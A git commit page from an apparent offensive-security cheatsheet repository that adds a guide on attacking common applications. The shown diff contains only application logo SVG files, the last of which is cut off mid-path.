daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit ad8eee4b87821386a6c6f2557c66bb40b1eb6942
parent 0a4129cb337fbf1b2094906d0a7bfaddf74377d1
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Tue, 15 Sep 2026 02:35:40 +0100

feat: add detailed Attacking Common Applications guide (CPTS module 24)

Long-form companion to the condensed attacking-common-applications cheat
sheet, rewritten from the full HTB CPTS module. Covers discovery at scale
plus WordPress, Joomla, Drupal, Tomcat, Jenkins, Splunk, PRTG, osTicket,
GitLab, CGI/Shellshock, thick clients, ColdFusion, IIS tilde, LDAP
injection, mass assignment, connection-string recovery, hardening, and
the three skills assessments.

Includes 18 Rose Pine Mermaid attack-flow diagrams and 12 application
logos re-hosted from Wikimedia Commons, each with author/licence
attribution in an Image credits table.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01LGt1BFBCTS16MDy6Vewoxe

Diffstat:
Apublic/diagrams/attacking-common-applications/coldfusion.svg | 15+++++++++++++++
Apublic/diagrams/attacking-common-applications/drupal.svg | 2++
Apublic/diagrams/attacking-common-applications/gitlab.svg | 79+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Apublic/diagrams/attacking-common-applications/iis.png | 0
Apublic/diagrams/attacking-common-applications/jenkins.svg | 301+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Apublic/diagrams/attacking-common-applications/joomla.svg | 20++++++++++++++++++++
Apublic/diagrams/attacking-common-applications/osticket.png | 0
Apublic/diagrams/attacking-common-applications/prtg.svg | 72++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Apublic/diagrams/attacking-common-applications/shellshock.svg | 2++
Apublic/diagrams/attacking-common-applications/splunk.svg | 15+++++++++++++++
Apublic/diagrams/attacking-common-applications/tomcat.svg | 2++
Apublic/diagrams/attacking-common-applications/wordpress.svg | 68++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/content/sheets/pentest-workflow/attacking-common-applications-guide.md | 1078+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
13 files changed, 1654 insertions(+), 0 deletions(-)

diff --git a/public/diagrams/attacking-common-applications/coldfusion.svg b/public/diagrams/attacking-common-applications/coldfusion.svg @@ -0,0 +1,15 @@ +<?xml version="1.0" encoding="UTF-8"?> +<svg width="56" height="54" version="1.1" viewBox="0 0 56 54" xmlns="http://www.w3.org/2000/svg"> + <defs> + <style>.cls-1{fill:#002258;}.cls-2{fill:#7badff;}</style> + </defs> + <g transform="translate(-3.9998,-2)"> + <g data-name="Outline no shadow copy 3"> + <rect class="cls-1" x="3.9998" y="2" width="56" height="54" rx="9.9138" ry="9.9138"/> + </g> + </g> + <g transform="translate(-3.9998,-2)" data-name="Outlined Mnemonics &amp; Logos"> + <path class="cls-2" d="m34.701 35.377v3.811a0.48846 0.48846 0 0 1-0.29639 0.51807 9.9532 9.9532 0 0 1-2.2383 0.49951 23.829 23.829 0 0 1-2.9048 0.1665 16.359 16.359 0 0 1-4.0884-0.49951 12.094 12.094 0 0 1-3.5337-1.5171 10.783 10.783 0 0 1-2.7378-2.4976 11.063 11.063 0 0 1-1.7759-3.4409 14.493 14.493 0 0 1-0.62891-4.44 12.933 12.933 0 0 1 1.6279-6.5676 11.223 11.223 0 0 1 4.625-4.4031 15.181 15.181 0 0 1 7.1406-1.5725 23.368 23.368 0 0 1 2.8677 0.1482 8.6057 8.6057 0 0 1 1.9429 0.44384 0.47678 0.47678 0 0 1 0.18457 0.44409v4.0701c0 0.22193-0.08692 0.2959-0.25879 0.22193a8.0023 8.0023 0 0 0-2.1831-0.64746 16.975 16.975 0 0 0-2.7007-0.20362 8.5477 8.5477 0 0 0-4.2554 0.999 6.9255 6.9255 0 0 0-2.7378 2.7566 8.5398 8.5398 0 0 0-0.96191 4.1624 8.9989 8.9989 0 0 0 0.4624 3.0342 7.2031 7.2031 0 0 0 1.2764 2.2568 6.327 6.327 0 0 0 1.8501 1.5171 9.1202 9.1202 0 0 0 2.2012 0.83252 9.8108 9.8108 0 0 0 2.2759 0.27758 24.964 24.964 0 0 0 2.4976-0.11108 9.0565 9.0565 0 0 0 2.0532-0.44409q0.14721-0.111 0.22217-0.05542a0.29553 0.29553 0 0 1 0.07422 0.24054z"/> + <path class="cls-2" d="m38.808 25.905h-2.2202c-0.17286-0.02441-0.25928-0.11108-0.25928-0.259v-3.774a0.22919 0.22919 0 0 1 0.25928-0.259h2.2202v-0.592a13.001 13.001 0 0 1 0.18457-2.3125 7.3354 7.3354 0 0 1 0.59229-1.8686 6.421 6.421 0 0 1 2.1089-2.479 6.185 6.185 0 0 1 3.626-0.96191 9.4668 9.4668 0 0 1 1.0732 0.05542 3.3282 3.3282 0 0 1 0.85059 0.20361 0.38055 0.38055 0 0 1 0.25928 0.36988v3.6631q0 0.25927-0.29639 0.18506a3.9656 3.9656 0 0 0-0.55469-0.03711h-0.55469a2.5061 2.5061 0 0 0-1.166 0.259 1.5838 1.5838 0 0 0-0.73975 0.86963 4.5923 4.5923 0 0 0-0.24072 1.6465v0.999h3.1084c0.14746 0 0.24023 0.02466 0.27734 0.074a0.36848 0.36848 0 0 1 0.05567 0.22192v3.7371q0 0.25928-0.333 0.259h-3.1084v13.764a0.49676 0.49676 0 0 1-0.05518 0.22192c-0.03711 0.074-0.12939 0.11109-0.27783 0.11109h-4.5137c-0.19775 0-0.2959-0.11109-0.2959-0.333z"/> + </g> +</svg> diff --git a/public/diagrams/attacking-common-applications/drupal.svg b/public/diagrams/attacking-common-applications/drupal.svg @@ -0,0 +1 @@ +<?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [<!ENTITY st0 "fill:#93C5E4;"><!ENTITY st1 "fill:#FFF;"><!ENTITY st2 "fill:none;"><!ENTITY st3 "fill:#004975;"><!ENTITY st4 "fill:#00598E;"><!ENTITY st5 "fill:#0073BA;">]><svg version="1.1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="681.167px" height="778.583px" viewBox="0 0 681.167 778.583"><title>Druplicon</title><path style="&st4;" d="M510.167,144.833c-39.75-24.75-77.25-34.5-114.75-59.25c-23.25-15.75-55.5-53.25-82.5-85.5c-5.25,51.75-21,72.75-39,87.75c-38.25,30-62.25,39-95.25,57c-27.75,14.25-178.5,104.25-178.5,297.75s162.75,336,343.5,336s337.5-131.25,337.5-330S534.167,159.833,510.167,144.833z"/><path style="&st1;" d="M449.25,610.5c12,0,24.75,0.75,33.75,6.75s14.25,19.5,17.25,27s0,12-6,15c-5.25,3-6,1.5-11.25-8.25s-9.75-19.5-36-19.5s-34.5,9-47.25,19.5s-17.25,14.25-21.75,8.25s-3-12,5.25-19.5s21.75-19.5,34.5-24.75S437.25,610.5,449.25,610.5L449.25,610.5z"/><path style="&st1;" d="M324.75,696c15,12,37.5,21.75,85.5,21.75S492,704.25,507,693c6.75-5.25,9.75-0.75,10.5,2.25s2.25,7.5-3,12.75c-3.75,3.75-38.25,27.75-78.75,31.5s-95.25,6-128.25-24c-5.25-5.25-3.75-12.75,0-15.75s6.75-5.25,11.25-5.25S322.5,694.5,324.75,696L324.75,696z"/><path style="&st5;" d="M141,639c57-0.75,67.5-10.5,117.75-33c271.5-121.5,321.75-232.5,331.5-258s24-66.75,9-112.5c-2.896-8.832-5.006-15.924-6.53-21.63c-36.079-40.343-71.898-62.357-82.72-69.12c-39-24.75-77.25-34.5-114.75-59.25c-23.25-15-55.5-53.25-82.5-85.5c-5.25,51.75-20.25,73.5-39,87.75c-38.25,30-62.25,39-95.25,57C150.75,159.75,0,249,0,442.5c0,61.78,16.593,118.361,45.063,166.766L52.5,609C68.25,623.25,93,639.75,141,639z"/><path style="&st3;" d="M510,144.75c-39-24.75-77.25-34.5-114.75-59.25c-23.25-15-55.5-53.25-82.5-85.5c-5.25,51.75-20.25,73.5-39,87.75c-38.25,30-62.25,39-95.25,57C150.75,159.75,0,249,0,442.5c0,61.78,16.593,118.361,45.063,166.766C105.763,712.467,220.46,778.5,343.5,778.5c180.75,0,337.5-131.25,337.5-330c0-109.146-44.332-185.488-88.28-234.63C556.641,173.527,520.82,151.513,510,144.75z M601.164,232.547c49.242,61.564,74.211,134.221,74.211,215.953c0,47.428-9.033,92.23-26.849,133.165c-16.9,38.831-41.236,73.233-72.333,102.254c-61.47,57.364-144.107,88.956-232.693,88.956c-43.826,0-86.832-8.371-127.824-24.882c-40.263-16.217-76.547-39.438-107.843-69.02C41.923,616.678,5.625,532.696,5.625,442.5c0-80.336,26.076-151.72,77.503-212.167c39.289-46.18,81.655-71.774,98.047-80.634c7.958-4.341,15.423-8.172,22.643-11.877c22.63-11.615,44.005-22.586,73.404-45.645c15.677-11.914,32.377-30.785,39.489-78.702c24.774,29.466,53.522,62.579,75.49,76.752c19.5,12.87,39.501,21.888,58.844,30.61c18.298,8.25,37.219,16.781,55.942,28.663c0.031,0.021,0.702,0.438,0.702,0.438C562.421,184.11,591.581,220.566,601.164,232.547z"/><path style="&st0;" d="M316.5,15c10.5,30.75,9,46.5,9,53.25S321.75,93,309.75,102c-5.25,3.75-6.75,6.75-6.75,7.5c0,3,6.75,5.25,6.75,12c0,8.25-3.75,24.75-43.5,64.5s-96.75,75-141,96.75S60,303,54,292.5s2.25-33.75,30-64.5s115.5-75,115.5-75L309,76.5l6-29.25"/><path style="&st1;" d="M316.5,14.25c-6.75,49.5-21.75,64.5-42,80.25c-33.75,25.5-66.75,41.25-74.25,45c-19.5,9.75-90,48.75-126.75,105c-11.25,17.25,0,24,2.25,25.5s27.75,4.5,82.5-28.5S237,189,267.75,156.75c16.5-17.25,18.75-27,18.75-31.5c0-5.25-3.75-7.5-9.75-9c-3-0.75-3.75-2.25,0-4.5S296.25,102,300,99s21.75-15,22.5-34.5S321.75,31.5,316.5,14.25L316.5,14.25z"/><path style="&st1;" d="M147.75,559.5c0.75-58.5,55.5-113.25,124.5-114c87.75-0.75,148.5,87,192.75,86.25c37.5-0.75,109.5-74.25,144.75-74.25c37.5,0,48,39,48,62.25s-7.5,65.25-25.5,91.5s-29.25,36-50.25,34.5c-27-2.25-81-86.25-115.5-87.75c-43.5-1.5-138,90.75-212.25,90.75c-45,0-58.5-6.75-73.5-16.5C158.25,616.5,147,592.5,147.75,559.5L147.75,559.5z"/><path style="&st2;" d="M599.25,235.5c15,45.75,0.75,87-9,112.5s-60,136.5-331.5,258C208.5,628.5,198,638.25,141,639c-48,0.75-72.75-15.75-88.5-30l-7.437,0.266C105.763,712.467,220.46,778.5,343.5,778.5c180.75,0,337.5-131.25,337.5-330c0-109.146-44.332-185.488-88.28-234.63C594.244,219.576,596.354,226.668,599.25,235.5z"/></svg> +\ No newline at end of file diff --git a/public/diagrams/attacking-common-applications/gitlab.svg b/public/diagrams/attacking-common-applications/gitlab.svg @@ -0,0 +1,78 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!-- Generator: Adobe Illustrator 24.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) --> +<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1017.4899 310.96725" style="enable-background:new 0 0 1017.4899 310.96725;" xml:space="preserve"> +<style type="text/css"> + .st0{fill:#FAFAFA;} + .st1{fill:#F0F0F0;} + .st2{fill:#FFFFFF;} + .st3{fill:#E24329;} + .st4{fill:#FCA326;} + .st5{fill:#FC6D26;} + .st6{fill:#8C929D;} + .st7{fill:#2E2E2E;} + .st8{fill:none;stroke:#FCA326;stroke-width:16;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;} + .st9{fill:none;stroke:#FC6D26;stroke-width:16;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;} + .st10{fill:none;stroke:#E24329;stroke-width:16;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;} + .st11{fill:none;stroke:#F0F0F0;stroke-miterlimit:10;} + .st12{fill:#231F20;} + .st13{fill:none;stroke:#231F20;stroke-width:16;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;} + .st14{display:none;} + .st15{display:inline;opacity:0.1;fill:#E828E3;} + .st16{display:inline;} + .st17{opacity:0.1;fill:#E828E3;} + .st18{font-family:'SourceSansPro-Semibold';} + .st19{font-size:24px;} + .st20{display:inline;fill:#DB3B21;} + .st21{display:inline;fill:#FC6D26;} + .st22{display:inline;fill:#2E2E2E;} + .st23{display:inline;fill:#6E49CB;} + .st24{display:inline;fill:#380D75;} + .st25{display:inline;fill:#FCA121;} + .st26{opacity:0.6;fill:none;stroke:#231F20;stroke-width:2;stroke-miterlimit:10;stroke-dasharray:12,6;} + .st27{fill:none;stroke:#444444;stroke-width:1.5339;stroke-miterlimit:10;} +</style> +<g id="logo_art" transform="translate(-123.97696, -123.92475)"> + <g> + <g> + <path id="path14_3_" class="st6" d="M839.7,198.192h-21.8l0.1,162.5h88.3v-20.1h-66.5L839.7,198.192L839.7,198.192z"/> + <g id="g24_3_" transform="translate(977.327440, 143.284396)"> + <path id="path26_3_" class="st6" d="M13,188.892c-5.5,5.7-14.6,11.4-27,11.4c-16.6,0-23.3-8.2-23.3-18.9 c0-16.1,11.2-23.8,35-23.8c4.5,0,11.7,0.5,15.4,1.2v30.1H13z M-9.6,90.392c-17.6,0-33.8,6.2-46.4,16.7l7.7,13.4 c8.9-5.2,19.8-10.4,35.5-10.4c17.9,0,25.8,9.2,25.8,24.6v7.9c-3.5-0.7-10.7-1.2-15.1-1.2c-38.2,0-57.6,13.4-57.6,41.4 c0,25.1,15.4,37.7,38.7,37.7c15.7,0,30.8-7.2,36-18.9l4,15.9h15.4v-83.2C34.3,107.992,22.9,90.392-9.6,90.392L-9.6,90.392z"/> + </g> + <g id="g28_3_" transform="translate(1099.766904, 143.128930)"> + <path id="path30_3_" class="st6" d="M-17.7,201.192c-8.2,0-15.4-1-20.8-3.5v-67.3v-7.8c7.4-6.2,16.6-10.7,28.3-10.7 c21.1,0,29.2,14.9,29.2,39C19,185.092,5.9,201.192-17.7,201.192 M-8.5,90.592c-19.5,0-30,13.3-30,13.3v-21l-0.1-27.8h-9.8h-11.5 l0.1,158.5c10.7,4.5,25.3,6.9,41.2,6.9c40.7,0,60.3-26,60.3-70.9C41.6,114.092,23.5,90.592-8.5,90.592"/> + </g> + <g id="g32_5_" transform="translate(584.042117, 143.630796)"> + <path id="path34_5_" class="st6" d="M18.3,72.192c19.3,0,31.8,6.4,39.9,12.9l9.4-16.3c-12.7-11.2-29.9-17.2-48.3-17.2 c-46.4,0-78.9,28.3-78.9,85.4c0,59.8,35.1,83.1,75.2,83.1c20.1,0,37.2-4.7,48.4-9.4l-0.5-63.9v-7.5v-12.6H4v20.1h38l0.5,48.5 c-5,2.5-13.6,4.5-25.3,4.5c-32.2,0-53.8-20.3-53.8-63C-36.7,93.292-14.4,72.192,18.3,72.192"/> + </g> + <g id="g36_4_" transform="translate(793.569045, 142.577463)"> + <path id="path38_4_" class="st6" d="M-37.7,55.592H-59l0.1,27.3v11.2v6.5v11.4v65v0.2c0,26.3,11.4,43.9,43.9,43.9 c4.5,0,8.9-0.4,13.1-1.2v-19.1c-3.1,0.5-6.4,0.7-9.9,0.7c-17.9,0-25.8-9.2-25.8-24.6v-65h35.7v-17.8h-35.7L-37.7,55.592 L-37.7,55.592z"/> + </g> + <path id="path40_33_" class="st6" d="M680.4,360.692h21.3v-124h-21.3V360.692L680.4,360.692z"/> + <path id="path42_3_" class="st6" d="M680.4,219.592h21.3v-21.3h-21.3V219.592L680.4,219.592z"/> + </g> + <g> + <path id="path50_5_" class="st3" d="M292.778,434.892L292.778,434.892l62.199-191.322H230.669L292.778,434.892L292.778,434.892z"/> + <path id="path66_12_" class="st4" d="M143.549,243.57L143.549,243.57l-18.941,58.126c-1.714,5.278,0.137,11.104,4.661,14.394 l163.509,118.801L143.549,243.57L143.549,243.57z"/> + <path id="path74_5_" class="st3" d="M143.549,243.57h87.12l-37.494-115.224c-1.919-5.895-10.282-5.895-12.27,0L143.549,243.57 L143.549,243.57z"/> + <path id="path82_12_" class="st4" d="M442.097,243.57L442.097,243.57l18.873,58.126c1.714,5.278-0.137,11.104-4.661,14.394 L292.778,434.892L442.097,243.57L442.097,243.57z"/> + <path id="path86_5_" class="st3" d="M442.097,243.57h-87.12l37.425-115.224c1.919-5.895,10.282-5.895,12.27,0L442.097,243.57 L442.097,243.57z"/> + <polygon class="st5" points="292.778,434.892 354.977,243.57 442.097,243.57 "/> + <polygon class="st5" points="292.778,434.892 143.549,243.57 230.669,243.57 "/> + </g> + </g> +</g> +<g id="spacing_guides" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns" class="st14" transform="translate(-123.97696, -123.92475)"> + <path id="path40_32_" sketch:type="MSShapeGroup" class="st15" d="M-1,0v124h1268V0H-1L-1,0z"/> + <path id="path40_31_" sketch:type="MSShapeGroup" class="st15" d="M-1,435v124h1268V435H-1L-1,435z"/> + <path id="path40_30_" sketch:type="MSShapeGroup" class="st15" d="M261.69,434.551h62v-310h-62V434.551L261.69,434.551z"/> + <path id="path40_29_" sketch:type="MSShapeGroup" class="st15" d="M462.2,560h62V-1h-62V560L462.2,560z"/> + <text transform="matrix(1 0 0 1 256.2529 195)" class="st16 st18 st19">H: 2.5 x</text> + <text transform="matrix(1 0 0 1 468.4727 282.832)" class="st16 st18 st19">1/2 x</text> + <text transform="matrix(1 0 0 1 621.2881 500.4978)" class="st16 st18 st19">1x</text> + <text transform="matrix(1 0 0 1 621.2881 65.4988)" class="st16 st18 st19">1x</text> + <path id="path40_27_" sketch:type="MSShapeGroup" class="st15" d="M0,560h124V-1H0V560L0,560z"/> + <text transform="matrix(1 0 0 1 51.2881 282.832)" class="st16 st18 st19">1x</text> + <path id="path40_3_" sketch:type="MSShapeGroup" class="st15" d="M1142,560h124V-1h-124V560L1142,560z"/> + <text transform="matrix(1 0 0 1 1191.2881 282.832)" class="st16 st18 st19">1x</text> +</g> +</svg> +\ No newline at end of file diff --git a/public/diagrams/attacking-common-applications/iis.png b/public/diagrams/attacking-common-applications/iis.png Binary files differ. diff --git a/public/diagrams/attacking-common-applications/jenkins.svg b/public/diagrams/attacking-common-applications/jenkins.svg @@ -0,0 +1,300 @@ +<?xml version="1.0" encoding="UTF-8" standalone="no"?> +<!-- Created with Inkscape (http://www.inkscape.org/) --> + +<svg + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://creativecommons.org/ns#" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" + id="svg2" + version="1.1" + inkscape:version="0.48.0 r9654" + width="1032.1804" + height="331.85538" + xml:space="preserve" + sodipodi:docname="logo+title.svg"><metadata + id="metadata8"><rdf:RDF><cc:Work + rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /><dc:title /></cc:Work></rdf:RDF></metadata><defs + id="defs6"><clipPath + clipPathUnits="userSpaceOnUse" + id="clipPath18"><path + d="M 0,2494.84 0,0 l 1804.34,0 0,2494.84 -1804.34,0 z" + id="path20" + inkscape:connector-curvature="0" /></clipPath></defs><sodipodi:namedview + pagecolor="#ffffff" + bordercolor="#666666" + borderopacity="1" + objecttolerance="10" + gridtolerance="10" + guidetolerance="10" + inkscape:pageopacity="0" + inkscape:pageshadow="2" + inkscape:window-width="1881" + inkscape:window-height="824" + id="namedview4" + showgrid="false" + inkscape:zoom="1" + inkscape:cx="604.50836" + inkscape:cy="182.53093" + inkscape:window-x="2091" + inkscape:window-y="541" + inkscape:window-maximized="0" + inkscape:current-layer="g10" + fit-margin-top="10" + fit-margin-left="10" + fit-margin-right="10" + fit-margin-bottom="10" /><g + id="g10" + inkscape:groupmode="layer" + inkscape:label="ink_ext_XXXXXX" + transform="matrix(1.25,0,0,-1.25,10,321.85516)"><g + id="g3393"><path + d="m 177.718,129.264 c 0,-49.4288 -39.175,-89.4992 -87.5,-89.4992 -48.3242,0 -87.49925,40.0704 -87.49925,89.4992 0,49.43 39.17505,89.501 87.49925,89.501 48.325,0 87.5,-40.071 87.5,-89.501" + style="fill:#d33833;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path22" + inkscape:connector-curvature="0" /><path + d="m 6.28438,107.098 c 0,0 -6.33438,93.333 79.66602,96 l -5.9996,10 -46.6664,-15.667 -13.3336,-15.333 -11.66642,-22.334 -6.66719,-26 2,-17.333" + style="fill:#ef3d3a;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path24" + inkscape:connector-curvature="0" /><path + d="M 30.2883,190.319 C 14.9363,174.611 5.43633,152.923 5.43633,128.93 l 0,0 c 0,-23.988 9.49997,-45.6788 24.85197,-61.3839 l 0,0 C 45.6477,51.841 66.8152,42.15 90.2168,42.15 l 0,0 c 23.4022,0 44.5712,9.691 59.9292,25.3961 l 0,0 c 15.351,15.7051 24.853,37.3959 24.853,61.3839 l 0,0 c 0,23.993 -9.502,45.681 -24.853,61.389 l 0,0 c -15.358,15.702 -36.527,25.393 -59.9292,25.395 l 0,0 C 66.8152,215.712 45.6477,206.021 30.2883,190.319 l 0,0 z M 26.4023,63.7469 C 10.0867,80.4328 0,103.493 0,128.93 l 0,0 c 0,25.441 10.0867,48.499 26.4023,65.186 l 0,0 c 16.3118,16.69 38.8915,27.035 63.8145,27.032 l 0,0 c 24.9232,0.003 47.5052,-10.342 63.8142,-27.032 l 0,0 c 16.317,-16.687 26.405,-39.747 26.403,-65.186 l 0,0 c 0.002,-25.437 -10.086,-48.4972 -26.403,-65.1831 l 0,0 C 137.722,47.0578 115.14,36.7141 90.2168,36.7141 l 0,0 c -24.923,0 -47.5027,10.3437 -63.8145,27.0328 l 0,0" + style="fill:#231f20;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path26" + inkscape:connector-curvature="0" /><path + d="m 127.051,128.768 -13.334,-2 -18.0002,-2 -11.6672,-0.333 -11.3328,0.333 -8.6672,2.667 -7.6668,8.333 -6,17 -1.3332,3.667 -8,2.666 -4.6668,7.667 -3.3332,11 3.6672,9.667 8.666,3 7,-3.334 3.334,-7.333 4,0.667 1.3328,1.666 -1.3328,7.667 -0.334,9.667 2,13.333 -0.0781,7.616 6.0781,9.717 10.6668,7.667 18.6672,8 20.6662,-3 18,-13 8.334,-13.333 5.333,-9.667 1.333,-24 -4,-20.667 -7.333,-18.333 -7,-9.667" + style="fill:#f0d6b7;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path28" + inkscape:connector-curvature="0" /><path + d="m 115.717,71.102 -47.6674,-2 0,-8 4,-28 -2,-2.334 -33.3328,11.334 -2.334,4 -3.3332,37.666 -7.6656,22.667 -1.6672,5.333 26.666,18.333 8.334,3.334 7.3328,-9 6.3332,-5.667 7.334,-2.333 3.3328,-1 4,-17.333 3,-3.6668 7.6672,2.6668 -5.334,-10.334 29.0002,-13.666 -3.666,-2" + style="fill:#335061;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path30" + inkscape:connector-curvature="0" /><path + d="m 36.7168,187.435 8.666,3 7,-3.334 3.334,-7.333 4,0.667 1,4 -2,7.666 2,18.334 -1.6672,10 6,7 13,10.333 -3.6668,5 -18.3332,-9 -7.6668,-6 -4.3332,-9.333 -6.6668,-9 -2,-10.667 1.334,-11.333" + style="fill:#6d6b6d;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path32" + inkscape:connector-curvature="0" /><path + d="m 50.3828,218.768 c 0,0 5,12.333 25,18.333 20,6 1,4.334 1,4.334 l -21.666,-8.334 -8.334,-8.333 -3.666,-6.667 7.666,0.667" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path34" + inkscape:connector-curvature="0" /><path + d="m 40.3828,189.768 c 0,0 -7,23.334 19.6668,26.667 l -1,4 -18.3328,-4.334 -5.334,-17.333 1.334,-11.333 3.666,2.333" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path36" + inkscape:connector-curvature="0" /><path + d="m 51.0496,158.768 4.3645,4.229 c 0,0 1.9699,-0.229 2.3027,-2.562 0.3328,-2.334 1.3328,-23.334 15.666,-34.668 1.3074,-1.034 -10.666,1.668 -10.666,1.668 l -10.6672,16.666" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path38" + inkscape:connector-curvature="0" /><path + d="m 112.385,165.101 c 0,0 0.777,10.104 3.498,9.327 2.721,-0.777 2.721,-3.498 2.721,-3.498 0,0 -6.608,-4.275 -6.219,-5.829" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path40" + inkscape:connector-curvature="0" /><path + d="m 140.05,202.101 c 0,0 -5.494,-1.16 -6,-6 -0.506,-4.841 6,-1 7,-0.667" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path42" + inkscape:connector-curvature="0" /><path + d="m 99.7168,201.767 c 0,0 -7.334,-1 -7.334,-5.666 0,-4.667 8.3342,-4.334 10.6672,-2.334" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path44" + inkscape:connector-curvature="0" /><path + d="m 54.3828,180.101 c 0,0 -12.6672,7.667 -14,0.333 -1.3332,-7.333 -4.334,-12.667 2,-20.333 l -4.3332,1.333 -4,10.333 -1.3328,10 7.666,8.001 8.6668,-0.667 5,-4 0.3332,-5" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path46" + inkscape:connector-curvature="0" /><path + d="m 60.3828,201.101 c 0,0 5.6668,29.333 34.334,35 23.6012,4.665 35.9992,-1 40.6662,-6.333 0,0 -21,24.999 -41.0002,17.333 -20,-7.667 -34.666,-21.667 -34.3332,-30.666 0.5676,-15.328 0.3332,-15.334 0.3332,-15.334" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path48" + inkscape:connector-curvature="0" /><path + d="m 137.717,226.435 c 0,0 -9.666,0.333 -10,-8.334 0,0 -0.001,-1.333 0.666,-2.666 0,0 7.668,8.667 12.334,4" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path50" + inkscape:connector-curvature="0" /><path + d="m 95.3887,214.532 c 0,0 -1.6641,13.303 -13.0059,5.569 -7.3332,-5 -6.666,-12 -5.3332,-13.333 1.3332,-1.334 0.9707,-4.019 1.9856,-2.176 1.0144,1.843 0.6804,7.843 4.3476,9.509 3.6668,1.667 9.6777,3.529 12.0059,0.431" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path52" + inkscape:connector-curvature="0" /><path + d="m 64.0496,124.435 -31.3328,-14 c 0,0 13,-51.667 6.3328,-67.667 l -4.6668,1.666 -0.3332,19.6672 -8.6656,37.3328 -3.6672,10.334 32.666,21.999 9.6668,-9.332" + style="fill:#49728b;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path54" + inkscape:connector-curvature="0" /><path + d="m 67.2715,95.8578 4.4453,-5.4238 0,-20 -5.334,0 c 0,0 -0.666,14 -0.666,15.6672 0,1.6668 0.666,7.6668 0.666,7.6668" + style="fill:#49728b;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path56" + inkscape:connector-curvature="0" /><path + d="m 67.3828,67.434 -15,-0.666 4.334,-3 10.666,-1.6668" + style="fill:#49728b;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path58" + inkscape:connector-curvature="0" /><path + d="m 118.717,70.768 12.333,0.3332 3,-30.6672 -12.667,-1.666 -2.666,32" + style="fill:#335061;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path60" + inkscape:connector-curvature="0" /><path + d="m 122.05,70.768 18.667,1 c 0,0 7.666,19.3332 7.666,20.3332 0,1 6.667,27.9998 6.667,27.9998 l -15,15.666 -3,2.667 -8,-8 0,-31 -7,-28.666" + style="fill:#335061;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path62" + inkscape:connector-curvature="0" /><path + d="m 130.383,73.1012 -11.666,-2.3332 1.666,-9.334 c 4.333,-2 11.667,3.334 11.667,3.334" + style="fill:#49728b;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path64" + inkscape:connector-curvature="0" /><path + d="m 130.717,131.434 23.333,-17.333 0.667,8 -17.667,16.333 -6.333,-7" + style="fill:#49728b;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path66" + inkscape:connector-curvature="0" /><path + d="M 78.9508,5.09805 72.0496,33.102 68.6172,53.7648 68.0496,69.102 l 31.2348,1.6628 19.4326,0.0032 -1.767,-35.0032 3,-26.99996 -0.333,-5 -25.3326,-2 -15.3336,3.33321" + style="fill:#ffffff;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path68" + inkscape:connector-curvature="0" /><path + d="m 114.383,71.1012 c 0,0 -1.666,-34.6672 3.334,-59.3332 0,0 -10,-6.33402 -24.6674,-8.00003 l 28.0004,1 3.333,2 -4,54.66603 -1,11.668" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path70" + inkscape:connector-curvature="0" /><path + d="m 